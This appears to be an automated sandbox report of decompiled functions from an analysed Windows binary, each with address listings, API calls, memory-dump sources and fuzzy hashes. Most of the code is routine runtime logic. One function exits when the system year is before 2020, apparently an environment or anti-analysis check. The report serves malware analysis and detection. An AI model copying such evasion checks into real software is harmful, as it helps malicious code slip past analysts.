                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Resource$FindLoadLockSizeof
                                                                                • String ID:
                                                                                • API String ID: 3473537107-0
                                                                                • Opcode ID: e58589db6cc9c2ed489951130424e2c568b54bd93535f2053440df7c87e29db1
                                                                                • Instruction ID: 6a59b26ac78e4b5b86669d74dbecf5df281273e363dea241552c74f923b8e910
                                                                                • Opcode Fuzzy Hash: e58589db6cc9c2ed489951130424e2c568b54bd93535f2053440df7c87e29db1
                                                                                • Instruction Fuzzy Hash: 63F06DB36022046F9708EF6DA881D9B77DCEE993A4312016FF90CD7206DA38DD5183B8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00430110, Relevance: 6.0, APIs: 4, Instructions: 46sleepCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 58%
                                                                                			E00430110(void* __eax, void* __ebx, void* __edi, void* __esi) {
				char _v8;
				CHAR* _t20;
				long _t25;
				intOrPtr _t30;
				void* _t34;
				intOrPtr _t37;

				_push(0);
				_t34 = __eax;
				_push(_t37);
				_push(0x43018d);
				_push( *[fs:eax]);
				 *[fs:eax] = _t37;
				E0042FB5C(__eax);
				_t25 = GetTickCount();
				do {
					Sleep(0);
				} while (GetTickCount() - _t25 <= 0x3e8);
				E0042F7B4(_t34, _t25,  &_v8, 0, __edi, _t34);
				if(_v8 != 0) {
					_t20 = E004047D0(_v8);
					WinHelpA( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t34 + 0x1c)))) + 0xc))(), _t20, 9, 0);
				}
				_pop(_t30);
				 *[fs:eax] = _t30;
				_push(0x430194);
				return E00404320( &_v8);
			}









                                                                                0x00430113
                                                                                0x00430117
                                                                                0x0043011b
                                                                                0x0043011c
                                                                                0x00430121
                                                                                0x00430124
                                                                                0x00430129
                                                                                0x00430133
                                                                                0x00430135
                                                                                0x00430137
                                                                                0x00430143
                                                                                0x00430151
                                                                                0x0043015a
                                                                                0x00430163
                                                                                0x00430172
                                                                                0x00430172
                                                                                0x00430179
                                                                                0x0043017c
                                                                                0x0043017f
                                                                                0x0043018c

                                                                                APIs
                                                                                  • Part of subcall function 0042FB5C: WinHelpA.USER32 ref: 0042FB6B
                                                                                • GetTickCount.KERNEL32 ref: 0043012E
                                                                                • Sleep.KERNEL32(00000000,00000000,0043018D,?,?,00000000,00000000,?,00430103), ref: 00430137
                                                                                • GetTickCount.KERNEL32 ref: 0043013C
                                                                                • WinHelpA.USER32 ref: 00430172
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CountHelpTick$Sleep
                                                                                • String ID:
                                                                                • API String ID: 2438605093-0
                                                                                • Opcode ID: 215cb68ffd52fe6f5e1b5f238888ac6efa749f36870d96729315158fb80a6ae0
                                                                                • Instruction ID: 893ac3cba8f77228d60b9289927b75d4118f1bf31978c33a349a08650ecbfcdb
                                                                                • Opcode Fuzzy Hash: 215cb68ffd52fe6f5e1b5f238888ac6efa749f36870d96729315158fb80a6ae0
                                                                                • Instruction Fuzzy Hash: DF01F270700204AFE711EB76CC52B1EB3A8DB48B04FA1417BF500E3AC1CA3C6E049559
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004397C4, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 91%
                                                                                			E004397C4(void* __eax, intOrPtr* __edx) {
				char _v20;
				char _v28;
				intOrPtr _t17;
				void* _t19;
				void* _t21;
				void* _t32;
				void* _t39;
				void* _t45;
				intOrPtr _t47;
				intOrPtr _t48;
				void* _t50;
				void* _t51;
				intOrPtr* _t65;
				intOrPtr* _t67;
				void* _t68;

				_t67 = __edx;
				_t50 = __eax;
				_t17 =  *__edx;
				_t68 = _t17 - 0x84;
				if(_t68 > 0) {
					_t19 = _t17 + 0xffffff00 - 9;
					if(_t19 < 0) {
						_t21 = E00435E04(__eax);
						if(_t21 != 0) {
							L28:
							return _t21;
						}
						L27:
						return E00436914(_t50, _t67);
					}
					if(_t19 + 0xffffff09 - 0xb < 0) {
						_t21 = E00439730(__eax, _t51, __edx);
						if(_t21 == 0) {
							goto L27;
						}
						if( *((intOrPtr*)(_t67 + 0xc)) != 0) {
							goto L28;
						}
						_t21 = E0043C018(_t50);
						if(_t21 == 0) {
							goto L28;
						}
						_push( *((intOrPtr*)(_t67 + 8)));
						_push( *((intOrPtr*)(_t67 + 4)));
						_push( *_t67);
						_t32 = E0043BD14(_t50);
						_push(_t32);
						L00406CF8();
						return _t32;
					}
					goto L27;
				}
				if(_t68 == 0) {
					_t21 = E00436914(__eax, __edx);
					if( *((intOrPtr*)(__edx + 0xc)) != 0xffffffff) {
						goto L28;
					}
					E0040725C( *((intOrPtr*)(__edx + 8)), _t51,  &_v20);
					E004351E4(_t50,  &_v28,  &_v20);
					_t21 = E0043969C(_t50, 0,  &_v28, 0);
					if(_t21 == 0) {
						goto L28;
					}
					 *((intOrPtr*)(_t67 + 0xc)) = 1;
					return _t21;
				}
				_t39 = _t17 - 7;
				if(_t39 == 0) {
					_t65 = E0044CA54(__eax);
					if(_t65 == 0) {
						goto L27;
					}
					_t21 =  *((intOrPtr*)( *_t65 + 0xe4))();
					if(_t21 == 0) {
						goto L28;
					}
					goto L27;
				}
				_t21 = _t39 - 1;
				if(_t21 == 0) {
					if(( *(__eax + 0x54) & 0x00000020) != 0) {
						goto L28;
					}
				} else {
					if(_t21 == 0x17) {
						_t45 = E0043BD14(__eax);
						if(_t45 == GetCapture() &&  *0x46b990 != 0) {
							_t47 =  *0x46b990; // 0x0
							if(_t50 ==  *((intOrPtr*)(_t47 + 0x30))) {
								_t48 =  *0x46b990; // 0x0
								E00436848(_t48, 0, 0x1f, 0);
							}
						}
					}
				}
			}


















                                                                                0x004397ca
                                                                                0x004397cc
                                                                                0x004397ce
                                                                                0x004397d0
                                                                                0x004397d5
                                                                                0x004397f4
                                                                                0x004397f7
                                                                                0x004398d4
                                                                                0x004398db
                                                                                0x00439926
                                                                                0x00439926
                                                                                0x00439926
                                                                                0x00439917
                                                                                0x00000000
                                                                                0x0043991b
                                                                                0x00439805
                                                                                0x0043989e
                                                                                0x004398a5
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004398ab
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004398af
                                                                                0x004398b6
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004398bb
                                                                                0x004398bf
                                                                                0x004398c2
                                                                                0x004398c5
                                                                                0x004398ca
                                                                                0x004398cb
                                                                                0x00000000
                                                                                0x004398cb
                                                                                0x00000000
                                                                                0x0043980b
                                                                                0x004397d7
                                                                                0x0043984d
                                                                                0x00439856
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00439865
                                                                                0x00439874
                                                                                0x00439881
                                                                                0x00439888
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0043988e
                                                                                0x00000000
                                                                                0x0043988e
                                                                                0x004397d9
                                                                                0x004397dc
                                                                                0x00439817
                                                                                0x0043981b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00439827
                                                                                0x0043982f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00439835
                                                                                0x004397de
                                                                                0x004397df
                                                                                0x0043983e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004397e1
                                                                                0x004397e4
                                                                                0x004398e1
                                                                                0x004398ef
                                                                                0x004398fa
                                                                                0x00439902
                                                                                0x0043990d
                                                                                0x00439912
                                                                                0x00439912
                                                                                0x00439902
                                                                                0x004398ef
                                                                                0x004397e4

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Capture
                                                                                • String ID:
                                                                                • API String ID: 1145282425-3916222277
                                                                                • Opcode ID: 1e86b3af473012e45797b6946e2ec80d15827e37d479ea7193c588e5337ef3a1
                                                                                • Instruction ID: 43cdc9794d8c31f967ccfb3724705cbd40727e764bae9717ab87b78639a13af6
                                                                                • Opcode Fuzzy Hash: 1e86b3af473012e45797b6946e2ec80d15827e37d479ea7193c588e5337ef3a1
                                                                                • Instruction Fuzzy Hash: 523190B130020586CB24AA2D8C8575A6395AF8D318F15B53FB4A6C7792DABCCD05C759
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00422A48, Relevance: 4.6, APIs: 3, Instructions: 51fileclipboardCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00422A48(intOrPtr* __eax, void* __ecx, void* __edx) {
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				struct tagENHMETAHEADER _v104;
				void* __ebp;
				intOrPtr _t35;
				intOrPtr* _t37;
				struct HENHMETAFILE__* _t43;
				intOrPtr _t44;

				_t37 = __eax;
				_t43 = GetClipboardData(0xe);
				if(_t43 == 0) {
					_t35 =  *0x486c70; // 0x41cc04
					E00420084(_t35);
				}
				E0042221C(_t37);
				_t44 =  *((intOrPtr*)(_t37 + 0x28));
				 *(_t44 + 8) = CopyEnhMetaFileA(_t43, 0);
				GetEnhMetaFileHeader( *(_t44 + 8), 0x64,  &_v104);
				 *((intOrPtr*)(_t44 + 0xc)) = _v72 - _v104.rclFrame;
				 *((intOrPtr*)(_t44 + 0x10)) = _v68 - _v76;
				 *((short*)(_t44 + 0x18)) = 0;
				 *((char*)(_t37 + 0x2c)) = 1;
				 *((char*)(_t37 + 0x22)) =  *((intOrPtr*)( *_t37 + 0x24))() & 0xffffff00 | _t31 != 0x00000000;
				return  *((intOrPtr*)( *_t37 + 0x10))();
			}












                                                                                0x00422a51
                                                                                0x00422a5a
                                                                                0x00422a5e
                                                                                0x00422a60
                                                                                0x00422a65
                                                                                0x00422a65
                                                                                0x00422a6c
                                                                                0x00422a71
                                                                                0x00422a7c
                                                                                0x00422a89
                                                                                0x00422a94
                                                                                0x00422a9d
                                                                                0x00422aa0
                                                                                0x00422aa6
                                                                                0x00422ab6
                                                                                0x00422ac8

                                                                                APIs
                                                                                • GetClipboardData.USER32 ref: 00422A55
                                                                                • CopyEnhMetaFileA.GDI32(00000000,00000000,0000000E), ref: 00422A77
                                                                                • GetEnhMetaFileHeader.GDI32(?,00000064,?,00000000,00000000,0000000E), ref: 00422A89
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: FileMeta$ClipboardCopyDataHeader
                                                                                • String ID:
                                                                                • API String ID: 1752724394-0
                                                                                • Opcode ID: f038950ca6f9c00473857bcd711b38273f5b0737770c3da0e6ba2a956269e42b
                                                                                • Instruction ID: bb12562040d7b67789b93b38336892c41dc8d61957c77311b4894952eaca6ab9
                                                                                • Opcode Fuzzy Hash: f038950ca6f9c00473857bcd711b38273f5b0737770c3da0e6ba2a956269e42b
                                                                                • Instruction Fuzzy Hash: 2F115A727002009FD710DFAAC881A9ABBF8AF09310F51416AE509EB252DA75E8058B94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00453E74, Relevance: 4.5, APIs: 3, Instructions: 33synchronizationthreadCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00453E74() {
				struct tagPOINT _v12;
				void* _t5;
				long _t6;

				 *0x487c0c = GetCurrentThreadId();
				L5:
				_t5 =  *0x487c10; // 0x0
				_t6 = WaitForSingleObject(_t5, 0x64);
				if(_t6 == 0x102) {
					if( *0x487bfc != 0 &&  *((intOrPtr*)( *0x487bfc + 0x60)) != 0) {
						GetCursorPos( &_v12);
						if(E00433F18( &_v12) == 0) {
							E00456214( *0x487bfc);
						}
					}
					goto L5;
				}
				return _t6;
			}






                                                                                0x00453e85
                                                                                0x00453eb5
                                                                                0x00453eb7
                                                                                0x00453ebd
                                                                                0x00453ec7
                                                                                0x00453e8f
                                                                                0x00453e9d
                                                                                0x00453eac
                                                                                0x00453eb0
                                                                                0x00453eb0
                                                                                0x00453eac
                                                                                0x00000000
                                                                                0x00453e8f
                                                                                0x00453ecd

                                                                                APIs
                                                                                • GetCurrentThreadId.KERNEL32 ref: 00453E80
                                                                                • GetCursorPos.USER32(?), ref: 00453E9D
                                                                                • WaitForSingleObject.KERNEL32(00000000,00000064), ref: 00453EBD
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CurrentCursorObjectSingleThreadWait
                                                                                • String ID:
                                                                                • API String ID: 1359611202-0
                                                                                • Opcode ID: 0d685b062aa313f9fbac0738ec5c89146557773fd0303b381e542fe0166bf0ee
                                                                                • Instruction ID: d2d99c5f089fa3c85d60cfa871a23c48e11989d28af406eb27e7fd58bb948ea9
                                                                                • Opcode Fuzzy Hash: 0d685b062aa313f9fbac0738ec5c89146557773fd0303b381e542fe0166bf0ee
                                                                                • Instruction Fuzzy Hash: 41F0B4315082049ADB11FF55D887B4A73E8AB00347F5005BBE9109B2D2DB7DD998CF9D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0043AE98, Relevance: 3.1, APIs: 2, Instructions: 63windowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0043AE98(intOrPtr* __eax, intOrPtr __edx) {
				intOrPtr _v8;
				void* __ecx;
				void* _t25;
				intOrPtr* _t31;
				void* _t34;
				intOrPtr* _t37;
				void* _t45;

				_v8 = __edx;
				_t37 = __eax;
				if(( *(_v8 + 4) & 0x0000fff0) != 0xf100 ||  *((short*)(_v8 + 8)) == 0x20 ||  *((short*)(_v8 + 8)) == 0x2d || IsIconic( *(__eax + 0x180)) != 0 || GetCapture() != 0) {
					L8:
					if(( *(_v8 + 4) & 0x0000fff0) != 0xf100) {
						L10:
						return  *((intOrPtr*)( *_t37 - 0x10))();
					}
					_t25 = E0043ADE8(_t37, _t45);
					if(_t25 == 0) {
						goto L10;
					}
				} else {
					_t31 =  *0x486c60; // 0x487bfc
					if(_t37 ==  *((intOrPtr*)( *_t31 + 0x44))) {
						goto L8;
					} else {
						_t34 = E0044CA54(_t37);
						_t44 = _t34;
						if(_t34 == 0) {
							goto L8;
						} else {
							_t25 = E00436848(_t44, 0, 0xb017, _v8);
							if(_t25 == 0) {
								goto L8;
							}
						}
					}
				}
				return _t25;
			}










                                                                                0x0043ae9e
                                                                                0x0043aea1
                                                                                0x0043aeb3
                                                                                0x0043af11
                                                                                0x0043af21
                                                                                0x0043af30
                                                                                0x00000000
                                                                                0x0043af37
                                                                                0x0043af26
                                                                                0x0043af2e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0043aee2
                                                                                0x0043aee2
                                                                                0x0043aeec
                                                                                0x00000000
                                                                                0x0043aeee
                                                                                0x0043aef0
                                                                                0x0043aef5
                                                                                0x0043aef9
                                                                                0x00000000
                                                                                0x0043aefb
                                                                                0x0043af08
                                                                                0x0043af0f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0043af0f
                                                                                0x0043aef9
                                                                                0x0043aeec
                                                                                0x0043af3e

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CaptureIconic
                                                                                • String ID:
                                                                                • API String ID: 2277910766-0
                                                                                • Opcode ID: 035c0935c59929070d8e4baa2169d4ae75f6adc574a778504b0405bd02dbb178
                                                                                • Instruction ID: 846859b078d10d8aaf76f110c5631033decb9e4290ba70afc111639ee8f793f2
                                                                                • Opcode Fuzzy Hash: 035c0935c59929070d8e4baa2169d4ae75f6adc574a778504b0405bd02dbb178
                                                                                • Instruction Fuzzy Hash: 4B1191717402059BDB20EB59C9899AEB3E8EF08304F65907AF854DB352EB38ED10874D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00420114, Relevance: 3.0, APIs: 2, Instructions: 46windowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 58%
                                                                                			E00420114(void* __ebx) {
				char _v260;
				char _v264;
				long _t21;
				void* _t22;
				intOrPtr _t27;
				void* _t32;

				_v264 = 0;
				_push(_t32);
				_push(0x4201b0);
				_push( *[fs:eax]);
				 *[fs:eax] = _t32 + 0xfffffefc;
				_t21 = GetLastError();
				if(_t21 == 0 || FormatMessageA(0x1000, 0, _t21, 0x400,  &_v260, 0x100, 0) == 0) {
					E004200C0(_t22);
				} else {
					E00404588( &_v264, 0x100,  &_v260);
					E0040A0B0(_v264, 1);
					E00403D80();
				}
				_pop(_t27);
				 *[fs:eax] = _t27;
				_push(E004201B7);
				return E00404320( &_v264);
			}









                                                                                0x00420120
                                                                                0x00420128
                                                                                0x00420129
                                                                                0x0042012e
                                                                                0x00420131
                                                                                0x00420139
                                                                                0x0042013d
                                                                                0x00420192
                                                                                0x00420163
                                                                                0x00420174
                                                                                0x00420186
                                                                                0x0042018b
                                                                                0x0042018b
                                                                                0x00420199
                                                                                0x0042019c
                                                                                0x0042019f
                                                                                0x004201af

                                                                                APIs
                                                                                • GetLastError.KERNEL32(00000000,004201B0,?,00000000,?,004201C8,00000000,004237AF,00000000,00000000,0042394F,?,00000000,?,?), ref: 00420134
                                                                                • FormatMessageA.KERNEL32(00001000,00000000,00000000,00000400,?,00000100,00000000,00000000,004201B0,?,00000000,?,004201C8,00000000,004237AF,00000000), ref: 0042015A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: ErrorFormatLastMessage
                                                                                • String ID:
                                                                                • API String ID: 3479602957-0
                                                                                • Opcode ID: 5d3cbc5925a6b82f89cf140d2e6b1e7da9dd2226f353d930f36f67a6b6612a09
                                                                                • Instruction ID: ad20503c142e3ca41c96309a455ed1501e0d4e5da6d0d2a0d425aca6c717ba22
                                                                                • Opcode Fuzzy Hash: 5d3cbc5925a6b82f89cf140d2e6b1e7da9dd2226f353d930f36f67a6b6612a09
                                                                                • Instruction Fuzzy Hash: 2101D8743003185BD715AB619C82BE672E8DB44704F91447BFA04A25C2DAB96D50851D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040AC84, Relevance: 3.0, APIs: 2, Instructions: 37COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 46%
                                                                                			E0040AC84(int __eax, void* __ebx, void* __eflags) {
				char _v11;
				char _v16;
				intOrPtr _t28;
				void* _t31;
				void* _t33;

				_t33 = __eflags;
				_v16 = 0;
				_push(_t31);
				_push(0x40ace8);
				_push( *[fs:edx]);
				 *[fs:edx] = _t31 + 0xfffffff4;
				GetLocaleInfoA(__eax, 0x1004,  &_v11, 7);
				E00404588( &_v16, 7,  &_v11);
				_push(_v16);
				E00408708(7, GetACP(), _t33);
				_pop(_t28);
				 *[fs:eax] = _t28;
				_push(E0040ACEF);
				return E00404320( &_v16);
			}








                                                                                0x0040ac84
                                                                                0x0040ac8d
                                                                                0x0040ac92
                                                                                0x0040ac93
                                                                                0x0040ac98
                                                                                0x0040ac9b
                                                                                0x0040acaa
                                                                                0x0040acba
                                                                                0x0040acc2
                                                                                0x0040accb
                                                                                0x0040acd4
                                                                                0x0040acd7
                                                                                0x0040acda
                                                                                0x0040ace7

                                                                                APIs
                                                                                • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,0040ACE8), ref: 0040ACAA
                                                                                • GetACP.KERNEL32(?,?,00001004,?,00000007,00000000,0040ACE8), ref: 0040ACC3
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: InfoLocale
                                                                                • String ID:
                                                                                • API String ID: 2299586839-0
                                                                                • Opcode ID: 980127c2459337dbee2706cd46e3ba44dc983121193b9fc3e02e27b8105ef087
                                                                                • Instruction ID: d94507c29f09da32449ef1f4fd85f81ca756a17aa74cfc9d8502e6e39d08b03c
                                                                                • Opcode Fuzzy Hash: 980127c2459337dbee2706cd46e3ba44dc983121193b9fc3e02e27b8105ef087
                                                                                • Instruction Fuzzy Hash: 3BF06271E083047BEB04EBA2CC5299DB3AEEBC5718B91C47AA610B65C0EA7C65108755
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00408900, Relevance: 3.0, APIs: 2, Instructions: 33fileCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00408900(void* __eax, WORD* __ecx, signed int __edx) {
				WORD* _t15;
				void* _t21;
				long _t22;

				_t15 = __ecx;
				 *(__ecx + 0x10) =  !__edx & 0x0000001e;
				_t21 = FindFirstFileA(E004047D0(__eax), __ecx + 0x18);
				 *((intOrPtr*)(_t15 + 0x14)) = _t21;
				if(_t21 == 0xffffffff) {
					_t22 = GetLastError();
				} else {
					_t22 = E0040889C(_t15);
					if(_t22 != 0) {
						E00408974(_t15);
					}
				}
				return _t22;
			}






                                                                                0x00408903
                                                                                0x0040890c
                                                                                0x00408920
                                                                                0x00408922
                                                                                0x00408928
                                                                                0x00408945
                                                                                0x0040892a
                                                                                0x00408931
                                                                                0x00408935
                                                                                0x00408939
                                                                                0x00408939
                                                                                0x00408935
                                                                                0x0040894c

                                                                                APIs
                                                                                • FindFirstFileA.KERNEL32(00000000,?,?,?,?,00464E72,00000000,00464FEC,?,00000000,00465014), ref: 0040891B
                                                                                • GetLastError.KERNEL32(00000000,?,?,?,?,00464E72,00000000,00464FEC,?,00000000,00465014), ref: 00408940
                                                                                  • Part of subcall function 0040889C: FileTimeToLocalFileTime.KERNEL32(?), ref: 004088C9
                                                                                  • Part of subcall function 0040889C: FileTimeToDosDateTime.KERNEL32 ref: 004088D8
                                                                                  • Part of subcall function 00408974: FindClose.KERNEL32(?,?,0040893E,00000000,?,?,?,?,00464E72,00000000,00464FEC,?,00000000,00465014), ref: 00408980
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: FileTime$Find$CloseDateErrorFirstLastLocal
                                                                                • String ID:
                                                                                • API String ID: 976985129-0
                                                                                • Opcode ID: f885c16d38b7a68d9ebe354ea8a86bdc1ce2e0a3ba3b914a93eaf70104af9ffc
                                                                                • Instruction ID: 549a418afeaee24ec932401d58d4313025a0ff8cc2d17cdf94c077dfbf047a45
                                                                                • Opcode Fuzzy Hash: f885c16d38b7a68d9ebe354ea8a86bdc1ce2e0a3ba3b914a93eaf70104af9ffc
                                                                                • Instruction Fuzzy Hash: 21E065B3B0152417C7147E6E598196B61984A84778309537FB995FB3C6DA3CCC1243D9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0046A9D0, Relevance: 3.0, APIs: 2, Instructions: 14timeCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0046A9D0(signed int __eax) {
				signed int _t3;
				signed int _t5;
				struct _SYSTEMTIME* _t6;

				_t3 = __eax;
				_t5 = __eax;
				GetSystemTime(_t6);
				if(_t6->wYear < 0x7e4) {
					ExitProcess(0);
				}
				return _t3 & 0xffffff00 | _t5 == 0x80000001;
			}






                                                                                0x0046a9d0
                                                                                0x0046a9d4
                                                                                0x0046a9d7
                                                                                0x0046a9e2
                                                                                0x0046a9e6
                                                                                0x0046a9e6
                                                                                0x0046a9f8

                                                                                APIs
                                                                                • GetSystemTime.KERNEL32 ref: 0046A9D7
                                                                                • ExitProcess.KERNEL32(00000000), ref: 0046A9E6
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
